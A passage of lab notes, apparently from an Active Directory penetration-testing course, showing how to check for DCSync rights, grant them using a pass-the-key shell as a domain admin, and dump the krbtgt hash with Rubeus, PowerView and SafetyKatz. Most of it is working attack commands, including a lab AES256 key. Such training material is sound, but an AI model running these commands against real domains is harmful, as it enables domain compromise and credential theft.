🪞Check for DCSync rights, add them and pull hashes

First let's launch Powervew and look if we have replication rights

Replication rights in Active Directory (AD) refer to the permissions that control which users or groups can replicate directory information between domain controllers. These rights are crucial for ensuring the integrity and security of the replication process within an AD environment.

We can check if we have replication rights using the following commands

. C:\AD\Tools\PowerView.ps1 
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}

If we don't have replication rights, let's add them. Start a process as Domain Administrator by running the below comman from an elevated command prompt:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

this command will spawn a shell, now in the new process we can run the bypass command, run PowerView and then ->

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student613 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Now on a normal shell we can go and look and check for out rights ->

Get-DomainObjectAcl -SearchBase"DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx613"}

Now we'll need to encode lsadump::dcsync

and launch this command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"
PreviousAbuse the DSRM credential for persistenceNextModify security descriptors on DC & modify host security descriptors for WMI

Last updated